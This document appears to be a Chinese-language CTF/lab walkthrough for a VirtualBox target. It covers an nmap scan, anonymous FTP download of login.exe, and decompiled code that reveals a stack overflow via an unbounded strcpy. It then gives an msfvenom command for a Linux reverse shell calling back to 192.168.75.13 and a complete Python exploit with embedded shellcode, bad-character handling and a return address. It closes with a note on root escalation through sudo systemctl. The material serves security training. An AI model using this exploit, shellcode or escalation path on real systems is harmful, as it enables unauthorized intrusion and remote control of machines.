1、找到靶机ip:192.168.75.21
# Host discovery only (-sn: no port scan) across the /24 to find the target's address.
nmap -sn 192.168.75.0/24
2、扫描靶机端口
root@chounana:~# nmap -A -p- 192.168.75.21
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 192.168.75.21
Host is up (0.00047s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 50992 Nov 16 15:59 login.exe
|_-rw-r--r-- 1 0 0 28613 Nov 16 15:59 login_support.dll
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.75.13
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 5
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
MAC Address: 08:00:27:ED:BE:00 (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=2/10%OT=21%CT=1%CU=42073%PV=Y%DS=1%DC=D%G=Y%M=080027%T
OS:M=6023E258%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10A%TI=Z%CI=Z%II=I
OS:%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O
OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6
OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)
Network Distance: 1 hop
Service Info: OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 0.47 ms 192.168.75.21
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.76 seconds
root@chounana:~#
3、ftp匿名连接21端口,发现一个exe文件和一个dll动态链接库,这不有点像我上一篇后半部分的pwn嘛,下载下来
4、先猜测一波前面的2371端口应该就是login.exe运行的端口(注意:上面这次全端口扫描只显示21/tcp开放,"Not shown: 65534 closed ports",2371端口并不在这份输出里,复现时请重新扫一遍确认),把login.exe在本地跑起来,交互结果一样,证明猜想。另外留意login.exe是Windows PE(__stdcall、SOCKET、closesocket),而靶机是Unix(nmap的Service Info以及后面的sudo -l),最后用的也是linux/x86的payload,所以这个服务多半是在Wine之类的兼容层下运行的,本地复现时最好用同样的环境。接下来就是找到pwn的地方
5、将文件拖到ida中分析,同样的找到输出password的地方(ConnectionHandler),f3函数里面也有一个没有长度限制的strcpy;前面对输入的字符也有一些限制:0x2d 0x2e 0x46 0x47 0x59 0x5e 0x60这几个字节会被改成0xB0,并且紧跟在它后面的一个字节被写成0截断字符串,所以payload里只要出现其中任意一个就会被悄悄截断——这也是后面msfvenom -b要排除这些字节的原因
// Per-connection handler decompiled from login.exe (presumably a thread entry;
// lpThreadParameter is the client SOCKET). Sends the "Password:" prompt, reads one
// request of up to 4096 bytes, rewrites a small set of bytes (each becomes 0xB0 and the
// string is NUL-terminated right after it), then hands the string to f3(), whose
// unbounded strcpy() into a stack buffer is the overflow this write-up exploits.
// Returns 0 after one processed request, 1 if the initial send() failed.
int __stdcall ConnectionHandler(LPVOID lpThreadParameter)
{
int result; // eax
size_t v2; // eax
char Dst; // [esp+18h] [ebp-410h] -- IDA shows a stack array as one char; zeroed below, never read
char *Dest; // [esp+400h] [ebp-28h] -- heap copy of the request that gets filtered
int v5; // [esp+404h] [ebp-24h] -- recv() result (unused afterwards)
int v6; // [esp+408h] [ebp-20h] -- send() result
SOCKET s; // [esp+40Ch] [ebp-1Ch]
void *v8; // [esp+410h] [ebp-18h] -- 0x400-byte allocation that is never used or freed
char *buf; // [esp+414h] [ebp-14h] -- raw receive buffer
int len; // [esp+418h] [ebp-10h] -- receive size
unsigned int i; // [esp+41Ch] [ebp-Ch]
len = 4096;
buf = (char *)malloc(0x1000u);
v8 = malloc(0x400u);
memset(&Dst, 0, 0x3E8u);
memset(buf, 0, 0x1000u);
s = (SOCKET)lpThreadParameter;
// Length 11 sends the string's trailing NUL as well.
result = send((SOCKET)lpThreadParameter, "Password:\n", 11, 0);
v6 = result;
if ( result == -1 )
{
closesocket(s);
result = 1;
}
else
{
while ( lpThreadParameter )
{
result = recv(s, buf, len, 0);
v5 = result;
if ( result > 0 )
{
// 0xB54 (2900) bytes. strncpy with the same length leaves no terminator when the
// request fills the whole buffer, so the strlen() in the loop below can run past it.
Dest = (char *)malloc(0xB54u);
memset(Dest, 0, 0xB54u);
strncpy(Dest, buf, 0xB54u);
// Byte filter: '-' '.' 'F' 'G' 'Y' '^' '`' (0x2d 0x2e 0x46 0x47 0x59 0x5e 0x60).
// A match is rewritten to 0xB0 and the next byte set to NUL, i.e. the request is
// truncated right after the first filtered byte -- these are the bytes a payload
// must avoid. strlen() is re-evaluated each iteration, so the loop stops at the
// new terminator. NOTE(review): Dest[i + 1] with i == 0xB53 writes one byte past
// the allocation; reachable only if the copy above left no terminator and strlen()
// ran into adjacent heap data -- verify before relying on it.
for ( i = 0; ; ++i )
{
v2 = strlen(Dest);
if ( v2 <= i )
break;
if ( Dest[i] == 45 )
{
Dest[i + 1] = 0;
Dest[i] = -80;
}
if ( Dest[i] == 46 )
{
Dest[i + 1] = 0;
Dest[i] = -80;
}
if ( Dest[i] == 70 )
{
Dest[i + 1] = 0;
Dest[i] = -80;
}
if ( Dest[i] == 71 )
{
Dest[i + 1] = 0;
Dest[i] = -80;
}
if ( Dest[i] == 89 )
{
Dest[i + 1] = 0;
Dest[i] = -80;
}
if ( Dest[i] == 94 )
{
Dest[i + 1] = 0;
Dest[i] = -80;
}
if ( Dest[i] == 96 )
{
Dest[i + 1] = 0;
Dest[i] = -80;
}
}
// f3() strcpy()s the filtered string into a fixed stack buffer -- the overflow.
f3(Dest);
memset(Dest, 0, 0xB54u);
// Dest, buf and v8 are never freed.
closesocket(s);
return 0;
}
// v6 holds the send() result and cannot be -1 on this path, so this check never
// fires: a recv() of 0 (peer closed) or -1 just loops back and calls recv() again.
if ( v6 == -1 )
{
closesocket(s);
return 1;
}
}
}
return result;
}
f3函数:Dest位于ebp-0x6A2,中间隔着4字节的saved ebp,所以从缓冲区起点到返回地址的距离是0x6A2+4=1702个字节
// The vulnerable copy: an unbounded strcpy() of the (already filtered) request into a
// stack buffer that sits 0x6A2 bytes below the saved ebp. The saved ebp occupies the
// next 4 bytes and the return address follows it, so input byte 0x6A2 + 4 = 1702
// lands on the return address. Returns whatever strcpy() returns (the buffer address).
char *__cdecl f3(char *Source)
{
char Dest; // [esp+16h] [ebp-6A2h] -- IDA shows the stack array as a single char
return strcpy(&Dest, Source);
}
6、使用msf生成shellcode
# Linux x86 reverse shell back to the attacker box. -b lists the bytes the encoder must avoid:
# 0x00 terminates the server's strncpy/strlen and f3's strcpy; 0x2d 0x2e 0x46 0x47 0x59 0x5e 0x60
# are rewritten by ConnectionHandler (the request is truncated right after them); 0x0a is
# excluded by the author as well, though the visible filter does not check for it.
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.75.13 LPORT=4444 -b '\x00\x0a\x2d\x2e\x46\x47\x59\x5e\x60' -f python
最终代码
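#!/usr/bin/python3
"""Exploit for the login.exe password service (port 2371).

ConnectionHandler reads one request of up to 4096 bytes, rewrites a small set of
bytes (each becomes 0xB0 and the string is NUL-terminated right after it), then
passes the result to f3(), which strcpy()s it into a stack buffer 0x6A2 bytes
below the saved ebp. Input byte 1702 therefore overwrites the return address.

Run as a script: connects, reads the prompt, sends the payload once and exits.
"""
import socket

target_ip = '192.168.75.21'
target_port = 2371
recv_buf = 4096  # the server's own recv() size is also 4096, so one request must fit

# Bytes that must never appear in the payload: 0x00 stops the server's strncpy/strlen
# and f3's strcpy; 0x2d 0x2e 0x46 0x47 0x59 0x5e 0x60 are rewritten by the server and
# silently truncate the request; 0x0a was excluded when the shellcode was encoded too.
BAD_CHARS = b'\x00\x0a\x2d\x2e\x46\x47\x59\x5e\x60'

OFFSET_TO_RET = 0x6A2 + 4  # f3's buffer sits at ebp-0x6A2; the 4-byte saved ebp follows
junk = b'a' * OFFSET_TO_RET
# 0x625012b8 little-endian. The write-up does not say what gadget this is -- verify
# before reusing it on another build of login.exe / login_support.dll.
ret_addr = b'\xb8\x12\x50\x62'
# The author marks the sled as required; presumably ret_addr does not land exactly on
# the first shellcode byte -- confirm in a debugger if the shell does not come back.
nops = b'\x90' * 32
# msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.75.13 LPORT=4444 -b <BAD_CHARS> -f python
shellcode = b""
shellcode += b"\x33\xc9\xb1\x11\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
shellcode += b"\x13\x55\x91\xe7\x4e\x83\xeb\xfc\xe2\xf4\x64\x4a\x10"
shellcode += b"\xad\x06\xd2\xb4\x24\x57\x18\x06\xfe\x33\x5c\x67\xdd"
shellcode += b"\x0c\x21\xd8\x83\xd5\xd8\x9e\xb7\x3d\x51\x4f\x05\x58"
shellcode += b"\xf9\xe5\x4e\x51\x43\x6e\xaf\xe5\xf7\xb7\x1f\x06\x22"
shellcode += b"\xe4\xc7\xb4\x5c\x67\x1c\x3d\xff\xc8\x3d\x3d\xf9\xc8"
shellcode += b"\x61\x37\xf8\x6e\xad\x07\xc2\x6e\xaf\xe5\x9a\x2a\xce"


def build_payload():
    """Assemble junk + return address + NOP sled + shellcode.

    Returns the payload bytes.
    Raises ValueError if any filtered byte is present (the server would truncate
    the request there and the overflow would never reach the return address) or
    if the payload exceeds the server's single 4096-byte recv().
    """
    payload = junk + ret_addr + nops + shellcode
    clash = sorted(set(payload) & set(BAD_CHARS))
    if clash:
        listed = ", ".join(f"0x{b:02x}" for b in clash)
        raise ValueError(f"payload contains filtered bytes: {listed}")
    if len(payload) > recv_buf:
        raise ValueError(f"payload is {len(payload)} bytes, server reads at most {recv_buf}")
    return payload


def main():
    """Connect to the service, read the prompt, send the payload once and close."""
    payload = build_payload()
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as clientSock:
        clientSock.connect((target_ip, target_port))
        data_from_srv = clientSock.recv(recv_buf)
        print(f"Reply --> {data_from_srv}")
        print(f"Sending --> {payload}")
        clientSock.sendall(payload)


if __name__ == "__main__":
    main()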
7、本地监听,成功反弹shell,python提权到tty,得到第一个flag
使用sudo -l命令发现可以免密使用root身份执行systemctl命令,使用systemctl提权成功,拿到最终flag